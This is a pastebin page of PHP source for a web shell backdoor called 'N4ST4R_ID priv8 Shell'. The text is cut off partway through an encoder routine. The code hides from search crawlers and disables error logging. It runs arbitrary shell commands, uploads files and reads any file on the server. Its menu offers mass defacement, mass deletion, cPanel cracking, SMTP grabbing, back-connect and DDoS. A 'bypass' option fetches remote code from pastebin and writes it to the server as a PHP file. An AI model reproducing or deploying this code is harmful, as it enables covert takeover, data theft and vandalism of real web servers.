daily pastebin goal
79%
SHARE
TWEET

N4ST4R_ID priv8 Shell

a guest Apr 27th, 2018 692 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. $auth_pass = "d72b8b3a7e97390916dce62adfe2ab8f";
  3. session_start();
  4. error_reporting(0);
  5. set_time_limit(0);
  6. @set_magic_quotes_runtime(0);
  7. @clearstatcache();
  8. @ini_set('error_log',NULL);
  9. @ini_set('log_errors',0);
  10. @ini_set('max_execution_time',0);
  11. @ini_set('output_buffering',0);
  12. @ini_set('display_errors', 0);
  13.  
  14. $color = "#00ff00";
  15. $default_action = 'FilesMan';
  16. $default_use_ajax = true;
  17. $default_charset = 'UTF-8';
  18. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  19.     $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  20.     if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  21.         header('HTTP/1.0 404 Not Found');
  22.         exit;
  23.     }
  24. }
  25.  
  26. function login_shell() {
  27. ?>
  28. <html>
  29. <head>
  30. <title>Login</title>
  31. <style type="text/css">
  32. html {
  33.      background: url(https://media.giphy.com/media/GLLaNVnTx21na/giphy.gif) no-repeat center center fixed;
  34.   -webkit-background-size: cover;
  35.   -moz-background-size: cover;
  36.   -o-background-size: cover;
  37.   background-size: cover;
  38. }
  39. html,body{margin:0;padding:0;height:100%;font:13px Arial;}
  40. #wrapper{min-height:100%;position:relative;}
  41. #header{background:#f0f0f0;padding:5px;height:50px;color:#3000ff;}
  42. #body{padding-bottom:40px;padding-left:10px;}
  43. #footer{background:#f0f0f0;position:absolute;bottom:0;width:100%;
  44.    text-align:center;color:#408080;}
  45. header {
  46.     color: red;
  47.     margin: 10px auto;
  48. }
  49. fieldset {
  50.     width: 250px;
  51.     height: 140px;
  52.     background: #000000;
  53.     padding:4px 20px;
  54.     margin:0;
  55.     color:cinnamon;
  56.     letter-spacing:1px;
  57.      border: 1px solid blue;box-shadow: 0px 0px 15px white;
  58.     text-decoration: none;
  59.  
  60. }
  61. body{cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}
  62. input[type=password] {
  63.     width: 250px;
  64.     height: 25px;
  65.     color: red;
  66.     background: Transparent;
  67.     border: 1px dotted cyan;
  68.     padding: 5px;
  69.     margin-left: 20px;
  70.     text-align: center;
  71. }
  72. input[type=text] {
  73.     width: 250px;
  74.     height: 25px;
  75.     color: red;
  76.     background: Transparent;
  77.     border: 1px dotted cyan;
  78.     padding: 5px;
  79.     margin-left: 20px;
  80.     text-align: center;
  81. }
  82.         zeeb {
  83.         color: lime;
  84. }
  85. </style>
  86. </head>
  87.  
  88. <center>
  89. <font face="monospace" color="white">Hello There!</a>
  90. </br>
  91. </br>
  92. </br>
  93. <center>
  94. <img src="https://sendeyo.com/up/e40223589b7751a44ed05c9c737e2d23.png" height="370"><br>
  95. <header>
  96. <pre>
  97. Don't forget coli tq :*
  98. <br><strong>Login dulu lah kymak>:(</strong>
  99.     </pre>
  100. </header>
  101. </br>
  102. </br>
  103. </br>
  104. <fieldset><zeeb><marquee>LOGIN SHELL YA ANAK GOBLOK</marquee></zeeb><br>
  105.             <label for="login">Username</label>
  106.         <form method="post">
  107. <input type="text" name="id" value="Moba Kok Analough?">
  108. </form>
  109. Password
  110. <form method="post">
  111. <input type="password" name="pass"> <br><br>
  112. <input type="submit" value="Login">
  113. </fieldset>
  114. </form>
  115. <style>
  116. </style>
  117. </head>
  118. <body>
  119. <center>
  120.  
  121.  <div id="footer" color=Red size=3><b>Copyright � 2018 - N4ST4R_ID<br></p></div>
  122.  <div id="footer" color=Red size=3><b>All Rights Reserved.</></div>
  123. </font>
  124. </body>
  125. </head>
  126. <table border="0" cellspacing="1" cellpadding="4" class="tborder"><tr><td class="thead"><strong></strong></td></tr><tr><td class="trow1"></a></td></tr></table><br />
  127. <table border="0" cellspacing="1" cellpadding="4" class="tborder">
  128. <tbody><tr>
  129. <audio autoplay loop><source src="http://www.gamamanagement.ro/sianjingcoklat.mp3"></audio>
  130. <?php
  131. exit;
  132. }
  133. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  134.     if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  135.         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  136.     else
  137.         login_shell();
  138. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  139.     @ob_clean();
  140.     $file = $_GET['file'];
  141.     header('Content-Description: File Transfer');
  142.     header('Content-Type: application/octet-stream');
  143.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
  144.     header('Expires: 0');
  145.     header('Cache-Control: must-revalidate');
  146.     header('Pragma: public');
  147.     header('Content-Length: ' . filesize($file));
  148.     readfile($file);
  149.     exit;
  150. }
  151. ?>
  152. <html>
  153. <head>
  154. <title>N4ST4R_ID priv8 shell</title>
  155. <meta name='author' content='IndoXploit'>
  156. <meta charset="UTF-8">
  157. <style type='text/css'>
  158. @import url(https://fonts.googleapis.com/css?family=Ubuntu);
  159. html {
  160.      background-color: #000000;
  161.   -webkit-background-size: cover;
  162.   -moz-background-size: cover;
  163.   -o-background-size: cover;
  164.   background-size: cover;
  165.     color: #ffffff;
  166.     font-family: 'Ubuntu';
  167.     font-size: 13px;
  168.     width: 100%;
  169. }
  170. body {
  171.      text-align: center;
  172.     resize: none;
  173.     text-shadow: 2px 4px 10px;
  174. }
  175. select {
  176.     width: 152px;
  177.     background: #000000;
  178.     color: lime;
  179.     border: 1px solid #ffffff;
  180.     margin: 5px auto;
  181.     padding-left: 5px;
  182.     font-family: 'Ubuntu';
  183.     font-size: 13px;
  184. }
  185. .terimakasih {
  186.     border: 1px solid #5cb85c;
  187.     border-radius :4px;
  188.     width: 550px;
  189.       border: 1px solid #00fffb;box-shadow: 0px 0px 15px white;
  190.     height: 100px;
  191. }
  192.  
  193. th {
  194.     padding: 10px;
  195. }
  196. .php
  197. *{
  198.     font-size:12px;
  199.     font-family:Tahoma,Verdana,Arial;
  200. }
  201. textarea {
  202.     border: 1px solid #ffffff;
  203.     width: 100%;
  204.     height: 400px;
  205.     padding-left: 5px;
  206.     margin: 10px auto;
  207.     resize: none;
  208.     background: transparent;
  209.     color: blue;
  210.         border: 0px 0px 15px lime;
  211.     font-family: 'Ubuntu';
  212.     font-size: 13px;
  213. }
  214. a {
  215.     color: pink;
  216.     text-decoration: none;
  217. }
  218. li {
  219.     display: inline;
  220.     margin: 5px;
  221.     padding: 5px;
  222. }
  223. table, th, td {
  224.     border-collapse:collapse;
  225.     font-family: Tahoma, Geneva, sans-serif;
  226.     background: transparent;
  227.     font-family: 'Ubuntu';
  228.     font-size: 13px;
  229.      border: 1px solid #59fef1;box-shadow: 0px 0px 15px blue;
  230.      
  231. }
  232. a:hover {cursor: url(http://cur.cursors-4u.net/toons/too-12/too1107.cur), progress !important;}
  233. body{cursor: url("http://downloads.totallyfreecursors.com/thumbnails/aliendance.gif"), auto;}
  234. th {
  235.     padding: 10px;
  236. }
  237. a:hover {
  238.     color: pink;
  239.     text-decoration: underline;
  240. }
  241. .table_home, .th_home, .td_home {
  242.     border: 1px solid white;
  243. }
  244. #menu a{
  245.     color: cyan;
  246.     padding:4px 19px;
  247.     margin:0;
  248.     background:#222222;
  249.     text-decoration:none;
  250.     letter-spacing:2px;
  251.     -moz-border-radius: 5px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
  252.  
  253. }
  254. #menu a:hover{
  255.     background:#191919;
  256.     border-bottom:1px solid #333333;
  257.     border-top:1px solid #333333;
  258. }
  259. #kotak{
  260.     margin:0;
  261.     letter-spacing:1px;
  262.     height: 138px;
  263.     color: pink;
  264.      border: 1px solid Transparent;box-shadow: 0px 0px 15px Transparent;
  265.      text-decoration: none;
  266. }
  267. .td_home{
  268.     margin:0;
  269.     color:cinnamon;
  270.     letter-spacing:1px;
  271.      border: 1px solid #000000;box-shadow: 0px 0px 15px aqua;
  272.     text-decoration: none;
  273. }
  274. .th_home{
  275.         background:purple;
  276.     margin:0;
  277.     color:lime;
  278.     letter-spacing:1px;
  279.     text-decoration: none;
  280. }
  281. .tersakiti{
  282. border:3px dotted cyan;
  283. background: lime;
  284. }
  285. </style>
  286. </head>
  287. <?php
  288.  
  289. function w($dir,$perm) {
  290.     if(!is_writable($dir)) {
  291.         return "<font color=red>".$perm."</font>";
  292.     } else {
  293.         return "<font color=lime>".$perm."</font>";
  294.     }
  295. }
  296. function r($dir,$perm) {
  297.     if(!is_readable($dir)) {
  298.         return "<font color=red>".$perm."</font>";
  299.     } else {
  300.         return "<font color=lime>".$perm."</font>";
  301.     }
  302. }
  303. function exe($cmd) {
  304.     if(function_exists('system')) {        
  305.         @ob_start();       
  306.         @system($cmd);     
  307.         $buff = @ob_get_contents();        
  308.         @ob_end_clean();       
  309.         return $buff;  
  310.     } elseif(function_exists('exec')) {        
  311.         @exec($cmd,$results);      
  312.         $buff = "";        
  313.         foreach($results as $result) {         
  314.             $buff .= $result;      
  315.         } return $buff;    
  316.     } elseif(function_exists('passthru')) {        
  317.         @ob_start();       
  318.         @passthru($cmd);       
  319.         $buff = @ob_get_contents();        
  320.         @ob_end_clean();       
  321.         return $buff;  
  322.     } elseif(function_exists('shell_exec')) {      
  323.         $buff = @shell_exec($cmd);     
  324.         return $buff;  
  325.     }
  326. }
  327. function perms($file){
  328.     $perms = fileperms($file);
  329.     if (($perms & 0xC000) == 0xC000) {
  330.     // Socket
  331.     $info = 's';
  332.     } elseif (($perms & 0xA000) == 0xA000) {
  333.     // Symbolic Link
  334.     $info = 'l';
  335.     } elseif (($perms & 0x8000) == 0x8000) {
  336.     // Regular
  337.     $info = '-';
  338.     } elseif (($perms & 0x6000) == 0x6000) {
  339.     // Block special
  340.     $info = 'b';
  341.     } elseif (($perms & 0x4000) == 0x4000) {
  342.     // Directory
  343.     $info = 'd';
  344.     } elseif (($perms & 0x2000) == 0x2000) {
  345.     // Character special
  346.     $info = 'c';
  347.     } elseif (($perms & 0x1000) == 0x1000) {
  348.     // FIFO pipe
  349.     $info = 'p';
  350.     } else {
  351.     // Unknown
  352.     $info = 'u';
  353.     }
  354.         // Owner
  355.     $info .= (($perms & 0x0100) ? 'r' : '-');
  356.     $info .= (($perms & 0x0080) ? 'w' : '-');
  357.     $info .= (($perms & 0x0040) ?
  358.     (($perms & 0x0800) ? 's' : 'x' ) :
  359.     (($perms & 0x0800) ? 'S' : '-'));
  360.     // Group
  361.     $info .= (($perms & 0x0020) ? 'r' : '-');
  362.     $info .= (($perms & 0x0010) ? 'w' : '-');
  363.     $info .= (($perms & 0x0008) ?
  364.     (($perms & 0x0400) ? 's' : 'x' ) :
  365.     (($perms & 0x0400) ? 'S' : '-'));
  366.     // World
  367.     $info .= (($perms & 0x0004) ? 'r' : '-');
  368.     $info .= (($perms & 0x0002) ? 'w' : '-');
  369.     $info .= (($perms & 0x0001) ?
  370.     (($perms & 0x0200) ? 't' : 'x' ) :
  371.     (($perms & 0x0200) ? 'T' : '-'));
  372.     return $info;
  373. }
  374. function hdd($s) {
  375.     if($s >= 1073741824)
  376.     return sprintf('%1.2f',$s / 1073741824 ).' GB';
  377.     elseif($s >= 1048576)
  378.     return sprintf('%1.2f',$s / 1048576 ) .' MB';
  379.     elseif($s >= 1024)
  380.     return sprintf('%1.2f',$s / 1024 ) .' KB';
  381.     else
  382.     return $s .' B';
  383. }
  384. function ambilKata($param, $kata1, $kata2){
  385.     if(strpos($param, $kata1) === FALSE) return FALSE;
  386.     if(strpos($param, $kata2) === FALSE) return FALSE;
  387.     $start = strpos($param, $kata1) + strlen($kata1);
  388.     $end = strpos($param, $kata2, $start);
  389.     $return = substr($param, $start, $end - $start);
  390.     return $return;
  391. }
  392. function getsource($url) {
  393.     $curl = curl_init($url);
  394.             curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  395.             curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  396.             curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  397.             curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  398.     $content = curl_exec($curl);
  399.             curl_close($curl);
  400.     return $content;
  401. }
  402. function bing($dork) {
  403.     $npage = 1;
  404.     $npages = 30000;
  405.     $allLinks = array();
  406.     $lll = array();
  407.     while($npage <= $npages) {
  408.         $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
  409.         if($x) {
  410.             preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
  411.             foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
  412.             $npage = $npage + 10;
  413.             if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
  414.         } else break;
  415.     }
  416.     $URLs = array();
  417.     foreach($allLinks as $url){
  418.         $exp = explode("/", $url);
  419.         $URLs[] = $exp[2];
  420.     }
  421.     $array = array_filter($URLs);
  422.     $array = array_unique($array);
  423.     $sss = count(array_unique($array));
  424.     foreach($array as $domain) {
  425.         echo $domain."\n";
  426.     }
  427. }
  428. function reverse($url) {
  429.     $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  430.           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  431.           curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  432.           curl_setopt($ch, CURLOPT_HEADER, 0);
  433.           curl_setopt($ch, CURLOPT_POST, 1);
  434.     $resp = curl_exec($ch);
  435.     $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  436.     $array = explode(",,", $resp);
  437.     unset($array[0]);
  438.     foreach($array as $lnk) {
  439.         $lnk = "http://$lnk";
  440.         $lnk = str_replace(",", "", $lnk);
  441.         echo $lnk."\n";
  442.         ob_flush();
  443.         flush();
  444.     }
  445.         curl_close($ch);
  446. }
  447. if(get_magic_quotes_gpc()) {
  448.     function idx_ss($array) {
  449.         return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  450.     }
  451.     $_POST = idx_ss($_POST);
  452.     $_COOKIE = idx_ss($_COOKIE);
  453. }
  454.  
  455. if(isset($_GET['dir'])) {
  456.     $dir = $_GET['dir'];
  457.     chdir($dir);
  458. } else {
  459.     $dir = getcwd();
  460. }
  461. $kernel = php_uname();
  462. $ip = gethostbyname($_SERVER['HTTP_HOST']);
  463. $dir = str_replace("\\","/",$dir);
  464. $scdir = explode("/", $dir);
  465. $freespace = hdd(disk_free_space("/"));
  466. $total = hdd(disk_total_space("/"));
  467. $used = $total - $freespace;
  468. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=red>OFF</font>";
  469. $ds = @ini_get("disable_functions");
  470. $mysql = (function_exists('mysql_connect')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  471. $curl = (function_exists('curl_version')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  472. $wget = (exe('wget --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  473. $perl = (exe('perl --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  474. $python = (exe('python --help')) ? "<font color=lime>ON</font>" : "<font color=red>OFF</font>";
  475. $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=lime>NONE</font>";
  476. if(!function_exists('posix_getegid')) {
  477.     $user = @get_current_user();
  478.     $uid = @getmyuid();
  479.     $gid = @getmygid();
  480.     $group = "?";
  481. } else {
  482.     $uid = @posix_getpwuid(posix_geteuid());
  483.     $gid = @posix_getgrgid(posix_getegid());
  484.     $user = $uid['name'];
  485.     $uid = $uid['uid'];
  486.     $group = $gid['name'];
  487.     $gid = $gid['gid'];
  488. }
  489. echo '<center><div id="kotak">';
  490. echo "System: <font color=lime>".$kernel."</font><br>";
  491. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
  492. echo "Server IP: <font color=lime>".$ip."</font> | Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font><br>";
  493. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
  494. echo "Safe Mode: $sm<br>";
  495. echo "Disable Functions: $show_ds<br>";
  496. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  497. echo "Current DIR: ";
  498. foreach($scdir as $c_dir => $cdir) {   
  499.     echo "<a href='?dir=";
  500.     for($i = 0; $i <= $c_dir; $i++) {
  501.         echo $scdir[$i];
  502.         if($i != $c_dir) {
  503.         echo "/";
  504.         }
  505.     }
  506.     echo "'>$cdir</a>/";
  507. }
  508. echo "<br><br><br>";
  509. echo "<center>";
  510. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  511. echo "<font color=red size=5>N4ST4R_ID priv Shell Backdoor</font><br>";
  512. echo "</div>";
  513. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
  514. echo '<center><div id="menu">';
  515. echo "<ul><br>";
  516. echo "<a href='?'>Home</a>";
  517. echo "<a href='?dir=$dir&do=upload'>Upload</a>";
  518. echo "<a href='?dir=$dir&do=cmd'>Command</a>";
  519. echo "<a href='?dir=$dir&do=mass_deface'>Mass Deface</a>";
  520. echo "<a href='?dir=$dir&do=mass_delete'>Mass Delete</a>";
  521. echo "<a href='?dir=$dir&do=config'>Config</a>";
  522. echo "<a href='?dir=$dir&do=jumping'>Jumping</a>";
  523. echo "<a href='?dir=$dir&do=cpanel'>CPanel Crack</a>";
  524. echo "<a href='?dir=$dir&do=smtp'>SMTP Grabber</a>";
  525. echo "<a href='?dir=$dir&do=cgi'>CGI Telnet</a> ";
  526. echo "<br><br><a href='?dir=$dir&do=fake_root'>Fake Root</a>";
  527. echo "<a href='?dir=$dir&do=krdp_shell'>KRDP Shell</a>";
  528. echo "<a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a>";
  529. echo "<a href='?dir=$dir&do=auto_wp'>Auto Edit Title</a>";
  530. echo "<a href='?dir=$dir&do=zoneh'>Zone-H</a>";
  531. echo "<a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a>";
  532. echo "<a href='?dir=$dir&do=cpftp_auto'>CFTP Auto Deface</a>";
  533. echo "<br><br><a href='?dir=$dir&do=krdp_shell'>KRDP Shell</a>";
  534. echo "<a href='?dir=$dir&do=network'>network</a>";
  535. echo "<a href='?dir=$dir&do=about'>about</a>";
  536. echo "<a href='?dir=$dir&do=adminer'>Adminer</a>";
  537. echo "<a href='?dir=$dir&do=tool'>Tool</a>";
  538. echo "<a href='?dir=$dir&do=admf'>Admin Finder</a>";
  539. echo "<a href='?dir=$dir&do=symlink'>symlink</a>";
  540. echo "<a href='?dir=$dir&do=autoklik'>Auto Deface</a>";
  541. echo "<br><br><a href='?dir=$dir&do=whois'>Whois</a>";
  542. echo "<a href='?dir=$dir&do=csrf'>CSRF Online</a>";
  543. echo "<a href='?dir=$dir&do=ende'>Encode Decode</a>";
  544. echo "<a href='?dir=$dir&do=ddos'>DDos</a>";
  545. echo "<a href='?dir=$dir&do=shellscanner'>Shell Scanner</a>";
  546. echo "<a href='?dir=$dir&do=ende'>Encode Decode</a><br><br>";
  547. echo "<a href='?xp=bypassserver'>Full bypass</a>";
  548. echo "<a href='?dir=$dir&do=defacerid'>DefacerID</a>";
  549. echo "<a href='?dir=$dir&do=bconnet'>Back Connect</a>";
  550. echo "<a href='?dir=$dir&do=reverse'>Reverse IP</a>";
  551. echo "<a href='https://indonesiaerrorsystem.blogspot.com'>Team Blog</a>";
  552. echo "<a href='http://indonesiaerrorsystem.tk'>More Tool</a>";
  553. echo "<a style='color: red;' href='?logout=true'>Logout</a><br><br><br><br>";
  554. echo "<a style='color: white;' href='https://shafou.com'>Streaming Bokep</a>";
  555. echo "<a style='color: white;' href='https://nekopoi.lol'>Download Hentai</a>";
  556. echo "</ul>";
  557. echo "</div>";
  558. if($_GET['logout'] == true) {
  559.     unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  560.     echo "<script>window.location='?';</script>";
  561. } elseif($_GET['do'] == 'upload') {
  562.     echo "<center>";
  563.     if($_POST['upload']) {
  564.         if($_POST['tipe_upload'] == 'biasa') {
  565.             if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  566.                 $act = "<font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  567.             } else {
  568.                 $act = "<font color=red>failed to upload file</font>";
  569.             }
  570.         } else {
  571.             $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  572.             $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  573.             if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  574.                 if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  575.                     $act = "<font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  576.                 } else {
  577.                     $act = "<font color=red>failed to upload file</font>";
  578.                 }
  579.             } else {
  580.                 $act = "<font color=red>failed to upload file</font>";
  581.             }
  582.         }
  583.     }
  584.     echo "Upload File:
  585.     <form method='post' enctype='multipart/form-data'>
  586.     <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  587.     <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  588.     <input type='file' name='ix_file'>
  589.     <input type='submit' value='upload' name='upload'>
  590.     </form>";
  591.     echo $act;
  592.     echo "</center>";
  593. }
  594. function parah($pastebin, $nama_file){
  595.     $usa = file_get_contents("$pastebin");
  596.     $frr = fopen("$nama_file", 'w');
  597.     fwrite($frr, $usa);
  598. }
  599. $xp = @$_GET['xp'];
  600. if($xp == "bypassserver"){
  601.             $config = parah("http://pastebin.com/raw/3g9HchNP", "bypass.php");
  602.        echo '<center><font color =red><a href="bypass.php" target="_blank">Clik Here To Switch Bypass</a><br></font></center>';
  603. } elseif($_GET['do'] == 'whois') {
  604. @set_time_limit(0);
  605.    @error_reporting(0);
  606.    function sws_domain_info($site)
  607.    {
  608.    $getip = @file_get_contents("http://networktools.nl/whois/$site");
  609.    flush();
  610.    $ip = @findit($getip,'<pre>','</pre>');
  611.    return $ip;
  612.    flush();
  613.    }
  614.    function sws_net_info($site)
  615.    {
  616.    $getip = @file_get_contents("http://networktools.nl/asinfo/$site");
  617.    $ip = @findit($getip,'<pre>','</pre>');
  618.    return $ip;
  619.    flush();
  620.    }
  621.    function sws_site_ser($site)
  622.    {
  623.    $getip = @file_get_contents("http://networktools.nl/reverseip/$site");
  624.    $ip = @findit($getip,'<pre>','</pre>');
  625.    return $ip;
  626.    flush();
  627.    }
  628.    function sws_sup_dom($site)
  629.    {
  630.    $getip = @file_get_contents("http://www.magic-net.info/dns-and-ip-tools.dnslookup?subd=".$site."&Search+subdomains=Find+subdomains");
  631.    $ip = @findit($getip,'<strong>Nameservers found:</strong>','<script type="text/javascript">');
  632.    return $ip;
  633.    flush();
  634.    }
  635.    function sws_port_scan($ip)
  636.    {
  637.    $list_post = array('80','21','22','2082','25','53','110','443','143');
  638.    foreach ($list_post as $o_port)
  639.    {
  640.    $connect = @fsockopen($ip,$o_port,$errno,$errstr,5);
  641.    if($connect)
  642.    {
  643.    echo ' $ip : $o_port ??? <u style="color: blue">Open</u> <br /><br />';
  644.    flush();
  645.    }
  646.    }
  647.    }
  648.    function findit($mytext,$starttag,$endtag) {
  649.    $posLeft = @stripos($mytext,$starttag)+strlen($starttag);
  650.    $posRight = @stripos($mytext,$endtag,$posLeft+1);
  651.    return @substr($mytext,$posLeft,$posRight-$posLeft);
  652.    flush();
  653.    }
  654.    echo '<br><br><center>';
  655.    echo '
  656.    <br />
  657.    <div class="sc"><form method="post"><table>
  658.    <tr><th colspan="5" style="border: 2px lime dotted;">Whois Site</th></tr>
  659.    <tr><td>Site to scan </td><td>:</td><td><input type="text" name="site" size="50" style="color:white;" class="inputz" value="site.com" /> &nbsp <input class="inputzbut" type="submit" style="color:white;background-color:#000000" name="scan" value="Scan !" /></td></tr>
  660.    </table></form></div>';
  661.    if(isset($_POST['scan']))
  662.    {
  663.    $site = @htmlentities($_POST['site']);
  664.    if (empty($site)){die('<br /><br /> Not add IP .. !');}
  665.    $ip_port = @gethostbyname($site);
  666.    echo "
  667.   <br /><div class='sc2'>Scanning [ $site ip $ip_port ] ... </div>
  668.   <div class='tit'> <br /><br />|-------------- Port Server ------------------| <br /></div>
  669.   <div class='ru'> <br /><br /><pre>
  670.   ";
  671.    echo "".sws_port_scan($ip_port)." </pre></div> ";
  672.    flush();
  673.    echo '<div class="tit"><br /><br />|-------------- Domain Info ------------------| <br /> </div>
  674.   <div class="ru">
  675.   <pre>".sws_domain_info($site)."</pre></div>';
  676.    flush();
  677.    echo '
  678.   <div class="tit"> <br /><br />|-------------- Network Info ------------------| <br /></div>
  679.   <div class="ru">
  680.   <pre>".sws_net_info($site)."</pre> </div>';
  681.    flush();
  682.    echo '<div class="tit"> <br /><br />|-------------- subdomains Server ------------------| <br /></div>
  683.   <div class="ru">
  684.   <pre>".sws_sup_dom($site)."</pre> </div>';
  685.    flush();
  686.    echo '<div class="tit"> <br /><br />|-------------- Site Server ------------------| <br /></div>
  687.   <div class="ru">
  688.   <pre>".sws_site_ser($site)."</pre> </div>
  689.   <div class="tit"> <br /><br />|-------------- END ------------------| <br /></div>';
  690.    flush();
  691.    }
  692.     echo '</center>';
  693.  
  694. } elseif($_GET['do'] == 'whois') {
  695. ?>
  696. <body >
  697. <center>
  698. <br>
  699. <form method="post"><br>
  700. <textarea class='inputz' cols=30 rows=5 name="mbutt" style="background:transparent;color:aqua;"></textarea><br><br>
  701. <select class='inputz' size="1" name="ope" style="background:red;color:aqua;">
  702. <option style='background:transparent;color:aqua;'><center>[#] Encryption [#]</option>
  703. <option value="urlencode" style='background:transparent;color:aqua;'>url</option>
  704. <option value="base64" style='background:transparent;color:aqua;'>Base64</option>
  705. <option value="ur" style='background:transparent;color:aqua;'>convert_uu</option>
  706. <option value="json" style='background:transparent;color:aqua;'>json</option>
  707. <option value="gzinflates" style='background:transparent;color:aqua;'>gzinflate - base64</option>
  708. <option value="str2" style='background:transparent;color:aqua;'>str_rot13 - base64</option>
  709. <option value="gzinflate" style='background:transparent;color:aqua;'>str_rot13 - gzinflate - base64</option>
  710. <option value="gzinflater" style='background:transparent;color:aqua;'>gzinflate - str_rot13 - base64</option>
  711. <option value="gzinflatex" style='background:transparent;color:aqua;'>gzinflate - str_rot13 - gzinflate - base64</option>
  712. <option value="gzinflatew" style='background:transparent;color:aqua;'>str_rot13 - convert_uu - url - gzinflate - str_rot13 - base64 - convert_uu - gzinflate - url - str_rot13 - gzinflate - base64</option>
  713. <option value="str" style='background:transparent;color:aqua;'>str_rot13 - gzinflate - str_rot13 - base64</option>
  714. <option value="url" style='background:transparent;color:aqua;'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
  715. <option value="hexencode" style='background:transparent;color:aqua;'>Hex Encode/Decode</option>
  716. <option value="md5" style='background:transparent;color:aqua;'><center>MD5 Hash</option>
  717. <option value="sha1" style='background:transparent;color:aqua;'>SHA1 Hash</option>
  718. <option value="str_rot13" style='background:transparent;color:aqua;'>ROT13 Hash</option>
  719. <option value="strlen" style='background:transparent;color:aqua;'>strlen</option>
  720. <option value="xxx" style='background:transparent;color:aqua;'>unescape</option>
  721. <option value="bbb" style='background:transparent;color:aqua;'>charAt</option>
  722. <option value="aaa" style='background:transparent;color:aqua;'>chr - bin2hex - substr</option>
  723. <option value="www" style='background:transparent;color:aqua;'>chr</option>
  724. <option value="sss" style='background:transparent;color:aqua;'>htmlspecialchars</option>
  725. <option value="eee" style='background:transparent;color:aqua;'>escape</option></select><br><input class='inputzbut' type='submit' name='submit' value='Encode' style="background:transparent;color:aqua;">
  726. <input class='inputzbut' type='submit' name='crack' value='Decode' style="background:transparent;color:aqua;"><br>
  727. </select>&nbsp;
  728. </form>
  729. <?php
  730. $submit = $_POST['submit'];
  731. if (isset($submit)){
  732. $op = $_POST["ope"];
  733. switch ($op) {case 'base64': $codi=base64_encode($text);
  734. break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  735. break;case 'json' : $codi=json_encode(utf8_encode($text));
  736. break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
  737. break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
  738. break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
  739. break;case 'gzinflatew' : $codi=base64_encode(gzdeflate(str_rot13(rawurlencode(gzdeflate(convert_uuencode(base64_encode(str_rot13(gzdeflate(convert_uuencode(rawurldecode(str_rot13($text))))))))))));
  740. break;case 'gzinflates' : $codi=base64_encode(gzdeflate($text));
  741. break;case 'str2' : $codi=base64_encode(str_rot13($text));
  742. break;case 'urlencode' : $codi=rawurlencode($text);
  743. break;case 'hexencode' : $codi=bin2hex($text);
  744. break;case 'md5' : $codi=md5($text);
  745. break;case 'ur' : $codi=convert_uuencode($text);
